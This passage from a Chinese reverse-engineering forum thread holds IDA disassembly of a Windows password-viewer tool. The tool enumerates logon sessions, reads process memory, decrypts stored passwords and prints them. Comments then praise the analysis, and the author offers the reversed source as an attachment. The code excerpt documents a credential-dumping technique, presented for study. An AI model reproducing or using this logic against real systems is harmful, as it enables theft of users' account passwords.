.text:00401340                         ; ---------------------------------------------------------------------------
.text:00401340
.text:00401340                         loc_401340:                             ; CODE XREF: _main+9Fj
.text:00401340 83 F8 02                                cmp     eax, 2
.text:00401343 75 2F                                   jnz     short loc_401374
.text:00401345 C7 44 24 10 1C 00 00 00                 mov     [esp+2CCh+var_2BC], 1Ch
.text:0040134D C7 44 24 0C 04 00 00 00                 mov     [esp+2CCh+var_2C0], 4
.text:00401355 E9 AB FE FF FF                          jmp     loc_401205
.text:0040135A                         ; ---------------------------------------------------------------------------
.text:0040135A
.text:0040135A                         loc_40135A:                             ; CODE XREF: _main+96j
.text:0040135A 83 F9 06                                cmp     ecx, 6
.text:0040135D 75 15                                   jnz     short loc_401374
.text:0040135F C7 44 24 10 20 00 00 00                 mov     [esp+2CCh+var_2BC], 20h
.text:00401367 C7 44 24 0C 01 00 00 00                 mov     [esp+2CCh+var_2C0], 1
.text:0040136F E9 91 FE FF FF                          jmp     loc_401205
.text:00401374                         ; ---------------------------------------------------------------------------
.text:00401374
.text:00401374                         loc_401374:                             ; CODE XREF: _main+1F3j
.text:00401374                                                                 ; _main+20Dj
.text:00401374 50                                      push    eax
.text:00401375 51                                      push    ecx
.text:00401376 68 04 91 40 00                          push    offset aUndefinedOsVer ; "[Undefined OS version]  Major: %d Minor"...
.text:0040137B E8 BD 04 00 00                          call    sub_40183D
.text:00401380 68 B0 91 40 00                          push    offset aEchoPressAnyKe ; "echo Press any Key to Continue ... & pa"...
.text:00401385 E8 B6 03 00 00                          call    _system
.text:0040138A 83 C4 10                                add     esp, 10h
.text:0040138D 53                                      push    ebx             ; hObject
.text:0040138E FF 15 38 80 40 00                       call    ds:CloseHandle
.text:00401394 5F                                      pop     edi
.text:00401395 33 C0                                   xor     eax, eax
.text:00401397 5B                                      pop     ebx
.text:00401398 81 C4 C4 02 00 00                       add     esp, 2C4h
.text:0040139E C3                                      retn
.text:0040139F                         ; ---------------------------------------------------------------------------
.text:0040139F
.text:0040139F                         loc_40139F:                             ; CODE XREF: _main+1D1j
.text:0040139F 39 BC 24 D4 00 00 00                    cmp     [esp+2D0h+Buffer], edi
.text:004013A6 75 0F                                   jnz     short loc_4013B7
.text:004013A8
.text:004013A8                         loc_4013A8:                             ; CODE XREF: _main+19Cj
.text:004013A8 68 34 91 40 00                          push    offset aSpecificLuidNo ; "Specific LUID NOT found\n"
.text:004013AD E8 24 04 00 00                          call    _puts
.text:004013B2 83 C4 04                                add     esp, 4
.text:004013B5 EB 59                                   jmp     short loc_401410
.text:004013B7                         ; ---------------------------------------------------------------------------
.text:004013B7
.text:004013B7                         loc_4013B7:                             ; CODE XREF: _main+256j
.text:004013B7 8B 54 24 18                             mov     edx, [esp+2D0h+var_2B8]
.text:004013BB 33 F6                                   xor     esi, esi
.text:004013BD B9 40 00 00 00                          mov     ecx, 40h
.text:004013C2 BF C0 BB 40 00                          mov     edi, offset unk_40BBC0
.text:004013C7 66 8B B4 14 E6 00 00 00                 mov     si, word ptr [esp+edx+2D0h+nSize+2]
.text:004013CF 8D 84 14 E4 00 00 00                    lea     eax, [esp+edx+2D0h+nSize]
.text:004013D6 8B 94 14 E8 00 00 00                    mov     edx, [esp+edx+2D0h+lpBaseAddress]
.text:004013DD 33 C0                                   xor     eax, eax
.text:004013DF F3 AB                                   rep stosd
.text:004013E1 8D 44 24 28                             lea     eax, [esp+2D0h+NumberOfBytesRead]
.text:004013E5 50                                      push    eax             ; lpNumberOfBytesRead
.text:004013E6 56                                      push    esi             ; nSize
.text:004013E7 68 C0 BB 40 00                          push    offset unk_40BBC0 ; lpBuffer
.text:004013EC 52                                      push    edx             ; lpBaseAddress
.text:004013ED 53                                      push    ebx             ; hProcess
.text:004013EE FF D5                                   call    ebp ; ReadProcessMemory ; 读取内存获取密码
.text:004013F0 56                                      push    esi
.text:004013F1 68 C0 BB 40 00                          push    offset unk_40BBC0
.text:004013F6 FF 54 24 34                             call    [esp+2D8h+var_2A4] ; 解密密码
.text:004013FA 68 C0 BB 40 00                          push    offset unk_40BBC0
.text:004013FF 68 F8 90 40 00                          push    offset aIS      ; "密码: %S\n\n"
.text:00401404 E8 34 04 00 00                          call    sub_40183D      ; 显示密码
.text:00401409 8B 7C 24 40                             mov     edi, [esp+2D8h+var_298]
.text:0040140D 83 C4 08                                add     esp, 8
.text:00401410
.text:00401410                         loc_401410:                             ; CODE XREF: _main+1EBj
.text:00401410                                                                 ; _main+265j
.text:00401410 8B 44 24 10                             mov     eax, [esp+2D0h+var_2C0]
.text:00401414 8B 4C 24 24                             mov     ecx, [esp+2D0h+var_2AC]
.text:00401418 40                                      inc     eax
.text:00401419 3B C1                                   cmp     eax, ecx        ; 检测是否已经查找完所枚举出来的LUID
.text:0040141B 89 44 24 10                             mov     [esp+2D0h+var_2C0], eax
.text:0040141F 0F 82 8A FE FF FF                       jb      loc_4012AF
.text:00401425 8B 74 24 30                             mov     esi, [esp+2D0h+var_2A0]
.text:00401429 8B 6C 24 34                             mov     ebp, [esp+2D0h+var_29C]
.text:0040142D
.text:0040142D                         loc_40142D:                             ; CODE XREF: _main+153j
.text:0040142D 53                                      push    ebx             ; hObject
.text:0040142E FF 15 38 80 40 00                       call    ds:CloseHandle
.text:00401434 8B 4C 24 20                             mov     ecx, [esp+2D0h+var_2B0]
.text:00401438 51                                      push    ecx
.text:00401439 FF 54 24 20                             call    [esp+2D4h+var_2B4]
.text:0040143D 8B 3D 18 80 40 00                       mov     edi, ds:FreeLibrary
.text:00401443 55                                      push    ebp             ; hLibModule
.text:00401444 FF D7                                   call    edi ; FreeLibrary
.text:00401446 56                                      push    esi             ; hLibModule
.text:00401447 FF D7                                   call    edi ; FreeLibrary
.text:00401449 83 7C 24 14 01                          cmp     [esp+2D4h+var_2C0], 1
.text:0040144E 75 1A                                   jnz     short loc_40146A
.text:00401450 8B 35 14 80 40 00                       mov     esi, ds:GetModuleHandleA
.text:00401456 68 EC 90 40 00                          push    offset aBcrypt_dll ; "bcrypt.dll"
.text:0040145B FF D6                                   call    esi ; GetModuleHandleA
.text:0040145D 50                                      push    eax             ; hLibModule
.text:0040145E FF D7                                   call    edi ; FreeLibrary
.text:00401460 68 D4 90 40 00                          push    offset aBcryptprimitiv ; "bcryptprimitives.dll"
.text:00401465 FF D6                                   call    esi ; GetModuleHandleA
.text:00401467 50                                      push    eax             ; hLibModule
.text:00401468 FF D7                                   call    edi ; FreeLibrary
.text:0040146A
.text:0040146A                         loc_40146A:                             ; CODE XREF: _main+2FEj
.text:0040146A 68 A4 90 40 00                          push    offset aEchoPressAny_0 ; "echo Press any Key to EXIT ... & pause "...
.text:0040146F E8 CC 02 00 00                          call    _system
.text:00401474 83 C4 04                                add     esp, 4
.text:00401477 33 C0                                   xor     eax, eax

上面这段代码就是这个程序的核心。在前面已经通过LsaEnumerateLogonSessions来枚举出程序中的LUID，然后根据LUID来读取用户名和登录域名，再在内存中查找对应的密码，如果找到密码，则将其解码后输出。
分析就到这里，附上这个小程序和我逆出来的代码，希望大家多多指点，共同进步。
这个东西是我利用周末的时间逆出来的，附件中有我逆出来的源代码，感兴趣的可以用VC++6.0自己建个工程，然后把.cpp文件添加进去调试即可。

旋冰 · 发表于 2014-9-28 02:07

我有一个cmd工具是看用户密码的。

hualuorenjia · 发表于 2015-3-30 17:39

写的很精彩。。。

狂奔的蜗牛2 · 发表于 2015-3-16 08:45

逆向源码是学习破解逆向的最高境界

加藤鹏 · 发表于 2015-3-14 20:52

只能说你是神啊，根本看不懂，唉，差的不是一点点啊，你太牛了

htpidk · 发表于 2015-3-13 12:50

一直都不会IDA，只会OD

冰琥珀 · 发表于 2014-3-1 17:51

红茶发表于 2014-3-1 17:19
这个好多呀

这个还好吧，逆出来的代码都不到1000行

892644330 · 发表于 2014-3-1 17:15

逆向源码是学习破解逆向的最高境界啊。。

Hmily · 发表于 2014-3-2 10:51

这东西最早是去年一个法国人放出来的好像。

红茶 · 发表于 2014-3-1 17:19

这个好多呀

864233160 · 发表于 2014-3-1 17:49

逆向源码是学习破解逆向的最高境界啊。

泪河之缘 · 发表于 2014-3-1 17:50

好屌爆啊。

青衫沾雨露 · 发表于 2014-3-1 18:15

收藏了加个秒杀谢谢分享

287166966 · 发表于 2014-3-2 11:48

这个软件好像是我在梦游发布的

九零-鑫鑫 · 发表于 2014-3-2 12:12

拜膜大牛学习了_(:з」∠)_

帐号		自动登录	找回密码
密码			注册[Register]

[调试逆向] 32位系统所有账户密码查看器的逆向分析

点评

免费评分

本帖被以下淘专辑推荐:

点评